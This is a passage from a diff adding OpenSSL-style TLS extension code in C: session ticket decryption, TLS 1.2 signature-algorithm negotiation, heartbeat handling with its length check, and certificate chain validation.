+    if (SSL_IS_DTLS(s)) {
+        i = *(p++);
+        p += i;
+        if (p >= limit)
+            return -1;
+    }
+    /* Skip past cipher list */
+    n2s(p, i);
+    p += i;
+    if (p >= limit)
+        return -1;
+    /* Skip past compression algorithm list */
+    i = *(p++);
+    p += i;
+    if (p > limit)
+        return -1;
+    /* Now at start of extensions */
+    if ((p + 2) >= limit)
+        return 0;
+    n2s(p, i);
+    while ((p + 4) <= limit) {
+        unsigned short type, size;
+        n2s(p, type);
+        n2s(p, size);
+        if (p + size > limit)
+            return 0;
+        if (type == TLSEXT_TYPE_session_ticket) {
+            int r;
+            if (size == 0) {
+                /*
+                 * The client will accept a ticket but doesn't currently have
+                 * one.
+                 */
+                s->tlsext_ticket_expected = 1;
+                return 1;
+            }
+            if (s->tls_session_secret_cb) {
+                /*
+                 * Indicate that the ticket couldn't be decrypted rather than
+                 * generating the session from ticket now, trigger
+                 * abbreviated handshake based on external mechanism to
+                 * calculate the master secret later.
+                 */
+                return 2;
+            }
+            r = tls_decrypt_ticket(s, p, size, session_id, len, ret);
+            switch (r) {
+            case 2:            /* ticket couldn't be decrypted */
+                s->tlsext_ticket_expected = 1;
+                return 2;
+            case 3:            /* ticket was decrypted */
+                return r;
+            case 4:            /* ticket decrypted but need to renew */
+                s->tlsext_ticket_expected = 1;
+                return 3;
+            default:           /* fatal error */
+                return -1;
+            }
+        }
+        p += size;
+    }
+    return 0;
+}
+
+/*-
+ * tls_decrypt_ticket attempts to decrypt a session ticket.
+ *
+ *   etick: points to the body of the session ticket extension.
+ *   eticklen: the length of the session tickets extenion.
+ *   sess_id: points at the session ID.
+ *   sesslen: the length of the session ID.
+ *   psess: (output) on return, if a ticket was decrypted, then this is set to
+ *       point to the resulting session.
+ *
+ * Returns:
+ *   -1: fatal error, either from parsing or decrypting the ticket.
+ *    2: the ticket couldn't be decrypted.
+ *    3: a ticket was successfully decrypted and *psess was set.
+ *    4: same as 3, but the ticket needs to be renewed.
+ */
+static int tls_decrypt_ticket(SSL *s, const unsigned char *etick,
+                              int eticklen, const unsigned char *sess_id,
+                              int sesslen, SSL_SESSION **psess)
+{
+    SSL_SESSION *sess;
+    unsigned char *sdec;
+    const unsigned char *p;
+    int slen, mlen, renew_ticket = 0;
+    unsigned char tick_hmac[EVP_MAX_MD_SIZE];
+    HMAC_CTX hctx;
+    EVP_CIPHER_CTX ctx;
+    SSL_CTX *tctx = s->initial_ctx;
+    /* Need at least keyname + iv + some encrypted data */
+    if (eticklen < 48)
+        return 2;
+    /* Initialize session ticket encryption and HMAC contexts */
+    HMAC_CTX_init(&hctx);
+    EVP_CIPHER_CTX_init(&ctx);
+    if (tctx->tlsext_ticket_key_cb) {
+        unsigned char *nctick = (unsigned char *)etick;
+        int rv = tctx->tlsext_ticket_key_cb(s, nctick, nctick + 16,
+                                            &ctx, &hctx, 0);
+        if (rv < 0)
+            return -1;
+        if (rv == 0)
+            return 2;
+        if (rv == 2)
+            renew_ticket = 1;
+    } else {
+        /* Check key name matches */
+        if (memcmp(etick, tctx->tlsext_tick_key_name, 16))
+            return 2;
+        HMAC_Init_ex(&hctx, tctx->tlsext_tick_hmac_key, 16,
+                     tlsext_tick_md(), NULL);
+        EVP_DecryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL,
+                           tctx->tlsext_tick_aes_key, etick + 16);
+    }
+    /*
+     * Attempt to process session ticket, first conduct sanity and integrity
+     * checks on ticket.
+     */
+    mlen = HMAC_size(&hctx);
+    if (mlen < 0) {
+        EVP_CIPHER_CTX_cleanup(&ctx);
+        return -1;
+    }
+    eticklen -= mlen;
+    /* Check HMAC of encrypted ticket */
+    HMAC_Update(&hctx, etick, eticklen);
+    HMAC_Final(&hctx, tick_hmac, NULL);
+    HMAC_CTX_cleanup(&hctx);
+    if (CRYPTO_memcmp(tick_hmac, etick + eticklen, mlen)) {
+        EVP_CIPHER_CTX_cleanup(&ctx);
+        return 2;
+    }
+    /* Attempt to decrypt session data */
+    /* Move p after IV to start of encrypted ticket, update length */
+    p = etick + 16 + EVP_CIPHER_CTX_iv_length(&ctx);
+    eticklen -= 16 + EVP_CIPHER_CTX_iv_length(&ctx);
+    sdec = OPENSSL_malloc(eticklen);
+    if (!sdec) {
+        EVP_CIPHER_CTX_cleanup(&ctx);
+        return -1;
+    }
+    EVP_DecryptUpdate(&ctx, sdec, &slen, p, eticklen);
+    if (EVP_DecryptFinal(&ctx, sdec + slen, &mlen) <= 0) {
+        EVP_CIPHER_CTX_cleanup(&ctx);
+        OPENSSL_free(sdec);
+        return 2;
+    }
+    slen += mlen;
+    EVP_CIPHER_CTX_cleanup(&ctx);
+    p = sdec;
+
+    sess = d2i_SSL_SESSION(NULL, &p, slen);
+    OPENSSL_free(sdec);
+    if (sess) {
+        /*
+         * The session ID, if non-empty, is used by some clients to detect
+         * that the ticket has been accepted. So we copy it to the session
+         * structure. If it is empty set length to zero as required by
+         * standard.
+         */
+        if (sesslen)
+            memcpy(sess->session_id, sess_id, sesslen);
+        sess->session_id_length = sesslen;
+        *psess = sess;
+        if (renew_ticket)
+            return 4;
+        else
+            return 3;
+    }
+    ERR_clear_error();
+    /*
+     * For session parse failure, indicate that we need to send a new ticket.
+     */
+    return 2;
+}
+
+/* Tables to translate from NIDs to TLS v1.2 ids */
+
+typedef struct {
+    int nid;
+    int id;
+} tls12_lookup;
+
+static tls12_lookup tls12_md[] = {
+    {NID_md5, TLSEXT_hash_md5},
+    {NID_sha1, TLSEXT_hash_sha1},
+    {NID_sha224, TLSEXT_hash_sha224},
+    {NID_sha256, TLSEXT_hash_sha256},
+    {NID_sha384, TLSEXT_hash_sha384},
+    {NID_sha512, TLSEXT_hash_sha512}
+};
+
+static tls12_lookup tls12_sig[] = {
+    {EVP_PKEY_RSA, TLSEXT_signature_rsa},
+    {EVP_PKEY_DSA, TLSEXT_signature_dsa},
+    {EVP_PKEY_EC, TLSEXT_signature_ecdsa}
+};
+
+static int tls12_find_id(int nid, tls12_lookup *table, size_t tlen)
+{
+    size_t i;
+    for (i = 0; i < tlen; i++) {
+        if (table[i].nid == nid)
+            return table[i].id;
+    }
+    return -1;
+}
+
+static int tls12_find_nid(int id, tls12_lookup *table, size_t tlen)
+{
+    size_t i;
+    for (i = 0; i < tlen; i++) {
+        if ((table[i].id) == id)
+            return table[i].nid;
+    }
+    return NID_undef;
+}
+
+int tls12_get_sigandhash(unsigned char *p, const EVP_PKEY *pk,
+                         const EVP_MD *md)
+{
+    int sig_id, md_id;
+    if (!md)
+        return 0;
+    md_id = tls12_find_id(EVP_MD_type(md), tls12_md,
+                          sizeof(tls12_md) / sizeof(tls12_lookup));
+    if (md_id == -1)
+        return 0;
+    sig_id = tls12_get_sigid(pk);
+    if (sig_id == -1)
+        return 0;
+    p[0] = (unsigned char)md_id;
+    p[1] = (unsigned char)sig_id;
+    return 1;
+}
+
+int tls12_get_sigid(const EVP_PKEY *pk)
+{
+    return tls12_find_id(pk->type, tls12_sig,
+                         sizeof(tls12_sig) / sizeof(tls12_lookup));
+}
+
+const EVP_MD *tls12_get_hash(unsigned char hash_alg)
+{
+    switch (hash_alg) {
+# ifndef OPENSSL_NO_MD5
+    case TLSEXT_hash_md5:
+#  ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            return NULL;
+#  endif
+        return EVP_md5();
+# endif
+# ifndef OPENSSL_NO_SHA
+    case TLSEXT_hash_sha1:
+        return EVP_sha1();
+# endif
+# ifndef OPENSSL_NO_SHA256
+    case TLSEXT_hash_sha224:
+        return EVP_sha224();
+
+    case TLSEXT_hash_sha256:
+        return EVP_sha256();
+# endif
+# ifndef OPENSSL_NO_SHA512
+    case TLSEXT_hash_sha384:
+        return EVP_sha384();
+
+    case TLSEXT_hash_sha512:
+        return EVP_sha512();
+# endif
+    default:
+        return NULL;
+
+    }
+}
+
+static int tls12_get_pkey_idx(unsigned char sig_alg)
+{
+    switch (sig_alg) {
+# ifndef OPENSSL_NO_RSA
+    case TLSEXT_signature_rsa:
+        return SSL_PKEY_RSA_SIGN;
+# endif
+# ifndef OPENSSL_NO_DSA
+    case TLSEXT_signature_dsa:
+        return SSL_PKEY_DSA_SIGN;
+# endif
+# ifndef OPENSSL_NO_ECDSA
+    case TLSEXT_signature_ecdsa:
+        return SSL_PKEY_ECC;
+# endif
+    }
+    return -1;
+}
+
+/* Convert TLS 1.2 signature algorithm extension values into NIDs */
+static void tls1_lookup_sigalg(int *phash_nid, int *psign_nid,
+                               int *psignhash_nid, const unsigned char *data)
+{
+    int sign_nid = 0, hash_nid = 0;
+    if (!phash_nid && !psign_nid && !psignhash_nid)
+        return;
+    if (phash_nid || psignhash_nid) {
+        hash_nid = tls12_find_nid(data[0], tls12_md,
+                                  sizeof(tls12_md) / sizeof(tls12_lookup));
+        if (phash_nid)
+            *phash_nid = hash_nid;
+    }
+    if (psign_nid || psignhash_nid) {
+        sign_nid = tls12_find_nid(data[1], tls12_sig,
+                                  sizeof(tls12_sig) / sizeof(tls12_lookup));
+        if (psign_nid)
+            *psign_nid = sign_nid;
+    }
+    if (psignhash_nid) {
+        if (sign_nid && hash_nid)
+            OBJ_find_sigid_by_algs(psignhash_nid, hash_nid, sign_nid);
+        else
+            *psignhash_nid = NID_undef;
+    }
+}
+
+/* Given preference and allowed sigalgs set shared sigalgs */
+static int tls12_do_shared_sigalgs(TLS_SIGALGS *shsig,
+                                   const unsigned char *pref, size_t preflen,
+                                   const unsigned char *allow,
+                                   size_t allowlen)
+{
+    const unsigned char *ptmp, *atmp;
+    size_t i, j, nmatch = 0;
+    for (i = 0, ptmp = pref; i < preflen; i += 2, ptmp += 2) {
+        /* Skip disabled hashes or signature algorithms */
+        if (tls12_get_hash(ptmp[0]) == NULL)
+            continue;
+        if (tls12_get_pkey_idx(ptmp[1]) == -1)
+            continue;
+        for (j = 0, atmp = allow; j < allowlen; j += 2, atmp += 2) {
+            if (ptmp[0] == atmp[0] && ptmp[1] == atmp[1]) {
+                nmatch++;
+                if (shsig) {
+                    shsig->rhash = ptmp[0];
+                    shsig->rsign = ptmp[1];
+                    tls1_lookup_sigalg(&shsig->hash_nid,
+                                       &shsig->sign_nid,
+                                       &shsig->signandhash_nid, ptmp);
+                    shsig++;
+                }
+                break;
+            }
+        }
+    }
+    return nmatch;
+}
+
+/* Set shared signature algorithms for SSL structures */
+static int tls1_set_shared_sigalgs(SSL *s)
+{
+    const unsigned char *pref, *allow, *conf;
+    size_t preflen, allowlen, conflen;
+    size_t nmatch;
+    TLS_SIGALGS *salgs = NULL;
+    CERT *c = s->cert;
+    unsigned int is_suiteb = tls1_suiteb(s);
+    if (c->shared_sigalgs) {
+        OPENSSL_free(c->shared_sigalgs);
+        c->shared_sigalgs = NULL;
+    }
+    /* If client use client signature algorithms if not NULL */
+    if (!s->server && c->client_sigalgs && !is_suiteb) {
+        conf = c->client_sigalgs;
+        conflen = c->client_sigalgslen;
+    } else if (c->conf_sigalgs && !is_suiteb) {
+        conf = c->conf_sigalgs;
+        conflen = c->conf_sigalgslen;
+    } else
+        conflen = tls12_get_psigalgs(s, &conf);
+    if (s->options & SSL_OP_CIPHER_SERVER_PREFERENCE || is_suiteb) {
+        pref = conf;
+        preflen = conflen;
+        allow = c->peer_sigalgs;
+        allowlen = c->peer_sigalgslen;
+    } else {
+        allow = conf;
+        allowlen = conflen;
+        pref = c->peer_sigalgs;
+        preflen = c->peer_sigalgslen;
+    }
+    nmatch = tls12_do_shared_sigalgs(NULL, pref, preflen, allow, allowlen);
+    if (!nmatch)
+        return 1;
+    salgs = OPENSSL_malloc(nmatch * sizeof(TLS_SIGALGS));
+    if (!salgs)
+        return 0;
+    nmatch = tls12_do_shared_sigalgs(salgs, pref, preflen, allow, allowlen);
+    c->shared_sigalgs = salgs;
+    c->shared_sigalgslen = nmatch;
+    return 1;
+}
+
+/* Set preferred digest for each key type */
+
+int tls1_save_sigalgs(SSL *s, const unsigned char *data, int dsize)
+{
+    CERT *c = s->cert;
+    /* Extension ignored for inappropriate versions */
+    if (!SSL_USE_SIGALGS(s))
+        return 1;
+    /* Should never happen */
+    if (!c)
+        return 0;
+
+    if (c->peer_sigalgs)
+        OPENSSL_free(c->peer_sigalgs);
+    c->peer_sigalgs = OPENSSL_malloc(dsize);
+    if (!c->peer_sigalgs)
+        return 0;
+    c->peer_sigalgslen = dsize;
+    memcpy(c->peer_sigalgs, data, dsize);
+    return 1;
+}
+
+int tls1_process_sigalgs(SSL *s)
+{
+    int idx;
+    size_t i;
+    const EVP_MD *md;
+    CERT *c = s->cert;
+    TLS_SIGALGS *sigptr;
+    if (!tls1_set_shared_sigalgs(s))
+        return 0;
+
+# ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+    if (s->cert->cert_flags & SSL_CERT_FLAG_BROKEN_PROTOCOL) {
+        /*
+         * Use first set signature preference to force message digest,
+         * ignoring any peer preferences.
+         */
+        const unsigned char *sigs = NULL;
+        if (s->server)
+            sigs = c->conf_sigalgs;
+        else
+            sigs = c->client_sigalgs;
+        if (sigs) {
+            idx = tls12_get_pkey_idx(sigs[1]);
+            md = tls12_get_hash(sigs[0]);
+            c->pkeys[idx].digest = md;
+            c->pkeys[idx].valid_flags = CERT_PKEY_EXPLICIT_SIGN;
+            if (idx == SSL_PKEY_RSA_SIGN) {
+                c->pkeys[SSL_PKEY_RSA_ENC].valid_flags =
+                    CERT_PKEY_EXPLICIT_SIGN;
+                c->pkeys[SSL_PKEY_RSA_ENC].digest = md;
+            }
+        }
+    }
+# endif
+
+    for (i = 0, sigptr = c->shared_sigalgs;
+         i < c->shared_sigalgslen; i++, sigptr++) {
+        idx = tls12_get_pkey_idx(sigptr->rsign);
+        if (idx > 0 && c->pkeys[idx].digest == NULL) {
+            md = tls12_get_hash(sigptr->rhash);
+            c->pkeys[idx].digest = md;
+            c->pkeys[idx].valid_flags = CERT_PKEY_EXPLICIT_SIGN;
+            if (idx == SSL_PKEY_RSA_SIGN) {
+                c->pkeys[SSL_PKEY_RSA_ENC].valid_flags =
+                    CERT_PKEY_EXPLICIT_SIGN;
+                c->pkeys[SSL_PKEY_RSA_ENC].digest = md;
+            }
+        }
+
+    }
+    /*
+     * In strict mode leave unset digests as NULL to indicate we can't use
+     * the certificate for signing.
+     */
+    if (!(s->cert->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT)) {
+        /*
+         * Set any remaining keys to default values. NOTE: if alg is not
+         * supported it stays as NULL.
+         */
+# ifndef OPENSSL_NO_DSA
+        if (!c->pkeys[SSL_PKEY_DSA_SIGN].digest)
+            c->pkeys[SSL_PKEY_DSA_SIGN].digest = EVP_sha1();
+# endif
+# ifndef OPENSSL_NO_RSA
+        if (!c->pkeys[SSL_PKEY_RSA_SIGN].digest) {
+            c->pkeys[SSL_PKEY_RSA_SIGN].digest = EVP_sha1();
+            c->pkeys[SSL_PKEY_RSA_ENC].digest = EVP_sha1();
+        }
+# endif
+# ifndef OPENSSL_NO_ECDSA
+        if (!c->pkeys[SSL_PKEY_ECC].digest)
+            c->pkeys[SSL_PKEY_ECC].digest = EVP_sha1();
+# endif
+    }
+    return 1;
+}
+
+int SSL_get_sigalgs(SSL *s, int idx,
+                    int *psign, int *phash, int *psignhash,
+                    unsigned char *rsig, unsigned char *rhash)
+{
+    const unsigned char *psig = s->cert->peer_sigalgs;
+    if (psig == NULL)
+        return 0;
+    if (idx >= 0) {
+        idx <<= 1;
+        if (idx >= (int)s->cert->peer_sigalgslen)
+            return 0;
+        psig += idx;
+        if (rhash)
+            *rhash = psig[0];
+        if (rsig)
+            *rsig = psig[1];
+        tls1_lookup_sigalg(phash, psign, psignhash, psig);
+    }
+    return s->cert->peer_sigalgslen / 2;
+}
+
+int SSL_get_shared_sigalgs(SSL *s, int idx,
+                           int *psign, int *phash, int *psignhash,
+                           unsigned char *rsig, unsigned char *rhash)
+{
+    TLS_SIGALGS *shsigalgs = s->cert->shared_sigalgs;
+    if (!shsigalgs || idx >= (int)s->cert->shared_sigalgslen)
+        return 0;
+    shsigalgs += idx;
+    if (phash)
+        *phash = shsigalgs->hash_nid;
+    if (psign)
+        *psign = shsigalgs->sign_nid;
+    if (psignhash)
+        *psignhash = shsigalgs->signandhash_nid;
+    if (rsig)
+        *rsig = shsigalgs->rsign;
+    if (rhash)
+        *rhash = shsigalgs->rhash;
+    return s->cert->shared_sigalgslen;
+}
+
+# ifndef OPENSSL_NO_HEARTBEATS
+int tls1_process_heartbeat(SSL *s)
+{
+    unsigned char *p = &s->s3->rrec.data[0], *pl;
+    unsigned short hbtype;
+    unsigned int payload;
+    unsigned int padding = 16;  /* Use minimum padding */
+
+    if (s->msg_callback)
+        s->msg_callback(0, s->version, TLS1_RT_HEARTBEAT,
+                        &s->s3->rrec.data[0], s->s3->rrec.length,
+                        s, s->msg_callback_arg);
+
+    /* Read type and payload length first */
+    if (1 + 2 + 16 > s->s3->rrec.length)
+        return 0;               /* silently discard */
+    hbtype = *p++;
+    n2s(p, payload);
+    if (1 + 2 + payload + 16 > s->s3->rrec.length)
+        return 0;               /* silently discard per RFC 6520 sec. 4 */
+    pl = p;
+
+    if (hbtype == TLS1_HB_REQUEST) {
+        unsigned char *buffer, *bp;
+        int r;
+
+        /*
+         * Allocate memory for the response, size is 1 bytes message type,
+         * plus 2 bytes payload length, plus payload, plus padding
+         */
+        buffer = OPENSSL_malloc(1 + 2 + payload + padding);
+        bp = buffer;
+
+        /* Enter response type, length and copy payload */
+        *bp++ = TLS1_HB_RESPONSE;
+        s2n(payload, bp);
+        memcpy(bp, pl, payload);
+        bp += payload;
+        /* Random padding */
+        RAND_pseudo_bytes(bp, padding);
+
+        r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer,
+                             3 + payload + padding);
+
+        if (r >= 0 && s->msg_callback)
+            s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
+                            buffer, 3 + payload + padding,
+                            s, s->msg_callback_arg);
+
+        OPENSSL_free(buffer);
+
+        if (r < 0)
+            return r;
+    } else if (hbtype == TLS1_HB_RESPONSE) {
+        unsigned int seq;
+
+        /*
+         * We only send sequence numbers (2 bytes unsigned int), and 16
+         * random bytes, so we just try to read the sequence number
+         */
+        n2s(pl, seq);
+
+        if (payload == 18 && seq == s->tlsext_hb_seq) {
+            s->tlsext_hb_seq++;
+            s->tlsext_hb_pending = 0;
+        }
+    }
+
+    return 0;
+}
+
+int tls1_heartbeat(SSL *s)
+{
+    unsigned char *buf, *p;
+    int ret;
+    unsigned int payload = 18;  /* Sequence number + random bytes */
+    unsigned int padding = 16;  /* Use minimum padding */
+
+    /* Only send if peer supports and accepts HB requests... */
+    if (!(s->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED) ||
+        s->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+        SSLerr(SSL_F_TLS1_HEARTBEAT, SSL_R_TLS_HEARTBEAT_PEER_DOESNT_ACCEPT);
+        return -1;
+    }
+
+    /* ...and there is none in flight yet... */
+    if (s->tlsext_hb_pending) {
+        SSLerr(SSL_F_TLS1_HEARTBEAT, SSL_R_TLS_HEARTBEAT_PENDING);
+        return -1;
+    }
+
+    /* ...and no handshake in progress. */
+    if (SSL_in_init(s) || s->in_handshake) {
+        SSLerr(SSL_F_TLS1_HEARTBEAT, SSL_R_UNEXPECTED_MESSAGE);
+        return -1;
+    }
+
+    /*
+     * Check if padding is too long, payload and padding must not exceed 2^14
+     * - 3 = 16381 bytes in total.
+     */
+    OPENSSL_assert(payload + padding <= 16381);
+
+    /*-
+     * Create HeartBeat message, we just use a sequence number
+     * as payload to distuingish different messages and add
+     * some random stuff.
+     *  - Message Type, 1 byte
+     *  - Payload Length, 2 bytes (unsigned int)
+     *  - Payload, the sequence number (2 bytes uint)
+     *  - Payload, random bytes (16 bytes uint)
+     *  - Padding
+     */
+    buf = OPENSSL_malloc(1 + 2 + payload + padding);
+    p = buf;
+    /* Message Type */
+    *p++ = TLS1_HB_REQUEST;
+    /* Payload length (18 bytes here) */
+    s2n(payload, p);
+    /* Sequence number */
+    s2n(s->tlsext_hb_seq, p);
+    /* 16 random bytes */
+    RAND_pseudo_bytes(p, 16);
+    p += 16;
+    /* Random padding */
+    RAND_pseudo_bytes(p, padding);
+
+    ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + payload + padding);
+    if (ret >= 0) {
+        if (s->msg_callback)
+            s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
+                            buf, 3 + payload + padding,
+                            s, s->msg_callback_arg);
+
+        s->tlsext_hb_pending = 1;
+    }
+
+    OPENSSL_free(buf);
+
+    return ret;
+}
+# endif
+
+# define MAX_SIGALGLEN   (TLSEXT_hash_num * TLSEXT_signature_num * 2)
+
+typedef struct {
+    size_t sigalgcnt;
+    int sigalgs[MAX_SIGALGLEN];
+} sig_cb_st;
+
+static int sig_cb(const char *elem, int len, void *arg)
+{
+    sig_cb_st *sarg = arg;
+    size_t i;
+    char etmp[20], *p;
+    int sig_alg, hash_alg;
+    if (sarg->sigalgcnt == MAX_SIGALGLEN)
+        return 0;
+    if (len > (int)(sizeof(etmp) - 1))
+        return 0;
+    memcpy(etmp, elem, len);
+    etmp[len] = 0;
+    p = strchr(etmp, '+');
+    if (!p)
+        return 0;
+    *p = 0;
+    p++;
+    if (!*p)
+        return 0;
+
+    if (!strcmp(etmp, "RSA"))
+        sig_alg = EVP_PKEY_RSA;
+    else if (!strcmp(etmp, "DSA"))
+        sig_alg = EVP_PKEY_DSA;
+    else if (!strcmp(etmp, "ECDSA"))
+        sig_alg = EVP_PKEY_EC;
+    else
+        return 0;
+
+    hash_alg = OBJ_sn2nid(p);
+    if (hash_alg == NID_undef)
+        hash_alg = OBJ_ln2nid(p);
+    if (hash_alg == NID_undef)
+        return 0;
+
+    for (i = 0; i < sarg->sigalgcnt; i += 2) {
+        if (sarg->sigalgs[i] == sig_alg && sarg->sigalgs[i + 1] == hash_alg)
+            return 0;
+    }
+    sarg->sigalgs[sarg->sigalgcnt++] = hash_alg;
+    sarg->sigalgs[sarg->sigalgcnt++] = sig_alg;
+    return 1;
+}
+
+/*
+ * Set suppored signature algorithms based on a colon separated list of the
+ * form sig+hash e.g. RSA+SHA512:DSA+SHA512
+ */
+int tls1_set_sigalgs_list(CERT *c, const char *str, int client)
+{
+    sig_cb_st sig;
+    sig.sigalgcnt = 0;
+    if (!CONF_parse_list(str, ':', 1, sig_cb, &sig))
+        return 0;
+    if (c == NULL)
+        return 1;
+    return tls1_set_sigalgs(c, sig.sigalgs, sig.sigalgcnt, client);
+}
+
+int tls1_set_sigalgs(CERT *c, const int *psig_nids, size_t salglen,
+                     int client)
+{
+    unsigned char *sigalgs, *sptr;
+    int rhash, rsign;
+    size_t i;
+    if (salglen & 1)
+        return 0;
+    sigalgs = OPENSSL_malloc(salglen);
+    if (sigalgs == NULL)
+        return 0;
+    for (i = 0, sptr = sigalgs; i < salglen; i += 2) {
+        rhash = tls12_find_id(*psig_nids++, tls12_md,
+                              sizeof(tls12_md) / sizeof(tls12_lookup));
+        rsign = tls12_find_id(*psig_nids++, tls12_sig,
+                              sizeof(tls12_sig) / sizeof(tls12_lookup));
+
+        if (rhash == -1 || rsign == -1)
+            goto err;
+        *sptr++ = rhash;
+        *sptr++ = rsign;
+    }
+
+    if (client) {
+        if (c->client_sigalgs)
+            OPENSSL_free(c->client_sigalgs);
+        c->client_sigalgs = sigalgs;
+        c->client_sigalgslen = salglen;
+    } else {
+        if (c->conf_sigalgs)
+            OPENSSL_free(c->conf_sigalgs);
+        c->conf_sigalgs = sigalgs;
+        c->conf_sigalgslen = salglen;
+    }
+
+    return 1;
+
+ err:
+    OPENSSL_free(sigalgs);
+    return 0;
+}
+
+static int tls1_check_sig_alg(CERT *c, X509 *x, int default_nid)
+{
+    int sig_nid;
+    size_t i;
+    if (default_nid == -1)
+        return 1;
+    sig_nid = X509_get_signature_nid(x);
+    if (default_nid)
+        return sig_nid == default_nid ? 1 : 0;
+    for (i = 0; i < c->shared_sigalgslen; i++)
+        if (sig_nid == c->shared_sigalgs[i].signandhash_nid)
+            return 1;
+    return 0;
+}
+
+/* Check to see if a certificate issuer name matches list of CA names */
+static int ssl_check_ca_name(STACK_OF(X509_NAME) *names, X509 *x)
+{
+    X509_NAME *nm;
+    int i;
+    nm = X509_get_issuer_name(x);
+    for (i = 0; i < sk_X509_NAME_num(names); i++) {
+        if (!X509_NAME_cmp(nm, sk_X509_NAME_value(names, i)))
+            return 1;
+    }
+    return 0;
+}
+
+/*
+ * Check certificate chain is consistent with TLS extensions and is usable by
+ * server. This servers two purposes: it allows users to check chains before
+ * passing them to the server and it allows the server to check chains before
+ * attempting to use them.
+ */
+
+/* Flags which need to be set for a certificate when stict mode not set */
+
+# define CERT_PKEY_VALID_FLAGS \
+        (CERT_PKEY_EE_SIGNATURE|CERT_PKEY_EE_PARAM)
+/* Strict mode flags */
+# define CERT_PKEY_STRICT_FLAGS \
+         (CERT_PKEY_VALID_FLAGS|CERT_PKEY_CA_SIGNATURE|CERT_PKEY_CA_PARAM \
+         | CERT_PKEY_ISSUER_NAME|CERT_PKEY_CERT_TYPE)
+
+int tls1_check_chain(SSL *s, X509 *x, EVP_PKEY *pk, STACK_OF(X509) *chain,
+                     int idx)
+{
+    int i;
+    int rv = 0;
+    int check_flags = 0, strict_mode;
+    CERT_PKEY *cpk = NULL;
+    CERT *c = s->cert;
+    unsigned int suiteb_flags = tls1_suiteb(s);
+    /* idx == -1 means checking server chains */
+    if (idx != -1) {
+        /* idx == -2 means checking client certificate chains */
+        if (idx == -2) {
+            cpk = c->key;
+            idx = cpk - c->pkeys;
+        } else
+            cpk = c->pkeys + idx;
+        x = cpk->x509;
+        pk = cpk->privatekey;
+        chain = cpk->chain;
+        strict_mode = c->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT;
+        /* If no cert or key, forget it */
+        if (!x || !pk)
+            goto end;
+# ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+        /* Allow any certificate to pass test */
+        if (s->cert->cert_flags & SSL_CERT_FLAG_BROKEN_PROTOCOL) {
+            rv = CERT_PKEY_STRICT_FLAGS | CERT_PKEY_EXPLICIT_SIGN |
+                CERT_PKEY_VALID | CERT_PKEY_SIGN;
+            cpk->valid_flags = rv;
+            return rv;
+        }
+# endif
+    } else {
+        if (!x || !pk)
+            goto end;
+        idx = ssl_cert_type(x, pk);
+        if (idx == -1)
+            goto end;
+        cpk = c->pkeys + idx;
+        if (c->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT)
+            check_flags = CERT_PKEY_STRICT_FLAGS;
+        else
+            check_flags = CERT_PKEY_VALID_FLAGS;
+        strict_mode = 1;
+    }
+
+    if (suiteb_flags) {
+        int ok;
+        if (check_flags)
+            check_flags |= CERT_PKEY_SUITEB;
+        ok = X509_chain_check_suiteb(NULL, x, chain, suiteb_flags);
+        if (ok == X509_V_OK)
+            rv |= CERT_PKEY_SUITEB;
+        else if (!check_flags)
+            goto end;
+    }
+
+    /*
+     * Check all signature algorithms are consistent with signature
+     * algorithms extension if TLS 1.2 or later and strict mode.
+     */
+    if (TLS1_get_version(s) >= TLS1_2_VERSION && strict_mode) {
+        int default_nid;
+        unsigned char rsign = 0;
+        if (c->peer_sigalgs)
+            default_nid = 0;
+        /* If no sigalgs extension use defaults from RFC5246 */
+        else {
+            switch (idx) {
+            case SSL_PKEY_RSA_ENC:
+            case SSL_PKEY_RSA_SIGN:
+            case SSL_PKEY_DH_RSA:
+                rsign = TLSEXT_signature_rsa;
+                default_nid = NID_sha1WithRSAEncryption;
+                break;
+
+            case SSL_PKEY_DSA_SIGN:
+            case SSL_PKEY_DH_DSA:
+                rsign = TLSEXT_signature_dsa;
+                default_nid = NID_dsaWithSHA1;
+                break;
+
+            case SSL_PKEY_ECC:
+                rsign = TLSEXT_signature_ecdsa;
+                default_nid = NID_ecdsa_with_SHA1;
+                break;
+
+            default:
+                default_nid = -1;
+                break;
+            }
+        }
+        /*
+         * If peer sent no signature algorithms extension and we have set
+         * preferred signature algorithms check we support sha1.
+         */
+        if (default_nid > 0 && c->conf_sigalgs) {
+            size_t j;
+            const unsigned char *p = c->conf_sigalgs;
+            for (j = 0; j < c->conf_sigalgslen; j += 2, p += 2) {
+                if (p[0] == TLSEXT_hash_sha1 && p[1] == rsign)
+                    break;
+            }
+            if (j == c->conf_sigalgslen) {
+                if (check_flags)
+                    goto skip_sigs;
+                else
+                    goto end;
+            }
+        }
+        /* Check signature algorithm of each cert in chain */
+        if (!tls1_check_sig_alg(c, x, default_nid)) {
+            if (!check_flags)
+                goto end;
+        } else
+            rv |= CERT_PKEY_EE_SIGNATURE;
+        rv |= CERT_PKEY_CA_SIGNATURE;
+        for (i = 0; i < sk_X509_num(chain); i++) {
+            if (!tls1_check_sig_alg(c, sk_X509_value(chain, i), default_nid)) {
+                if (check_flags) {
+                    rv &= ~CERT_PKEY_CA_SIGNATURE;
+                    break;
+                } else
+                    goto end;
+            }
+        }
+    }
+    /* Else not TLS 1.2, so mark EE and CA signing algorithms OK */
+    else if (check_flags)
+        rv |= CERT_PKEY_EE_SIGNATURE | CERT_PKEY_CA_SIGNATURE;
+ skip_sigs:
+    /* Check cert parameters are consistent */
+    if (tls1_check_cert_param(s, x, check_flags ? 1 : 2))
+        rv |= CERT_PKEY_EE_PARAM;
+    else if (!check_flags)
+        goto end;
+    if (!s->server)
+        rv |= CERT_PKEY_CA_PARAM;
+    /* In strict mode check rest of chain too */
+    else if (strict_mode) {
+        rv |= CERT_PKEY_CA_PARAM;
+        for (i = 0; i < sk_X509_num(chain); i++) {
